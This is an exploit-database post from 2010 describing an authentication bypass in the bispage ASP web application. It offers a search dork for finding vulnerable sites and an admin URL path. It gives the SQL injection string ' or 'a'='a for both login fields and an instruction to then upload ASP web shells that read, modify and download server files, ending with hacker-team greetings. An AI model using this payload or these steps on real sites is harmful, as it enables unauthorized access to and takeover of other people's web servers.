bispage – Bypass

  • 作者: SaMir-BonD
    日期: 2010-02-23
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/11555/
  • # Exploit Title: [ bispage Bypass Vulnerability]
    # Author: [SaMir-BonD] EGY@hotmail.com
    # Organization : TEAM-DZ
    # Formal sites : t00ls.org - h4kz.com
    # Software Link: [N/A]
    # Script's Language: [ASP]
    # Tested on: [Windows PHP/4.3.11os]
    # Dork :"Developed by Bispage.com"
    # CVE : [if exists]
    # Code : [exploit code]
    # Site page : bispage.com
    # Date: [23-2-2010]
    
    
    
    
    
    
    *Hey dudes how are you doin' :D
    *it's an easy bypass Vuln just see those steps :
    ________________________________________________
    1) Victim.com/script/admin
    2) User Between Brackets : (' or 'a'='a)
     Pass Between Brackets : (' or 'a'='a)
    3) Enjoy Uploading Shells :D ( upload ASP shell types to be able to read/modify/download Files)
    
    
    #Greetz to:
    -----------
     [TEAM-DZ: maxi32-noureddin-Skins-TheMoorish-Dr.Genius-IslamLee-M4st3r]
    HcJ-Mr.Mero-Laqi@hajdin-Sh3ko-EGY-MaF!4-Trackoda-Dr.Mozo-TNT_HACKER-Elkatrez-DataFr4ck3r
    & all those who know Samir-BonD(oXide)
    
    ---> h4kz.com & t00ls.org
    
    
    Note : La Elah Ella ALLAH .. Muhammad Rasool ALLAH..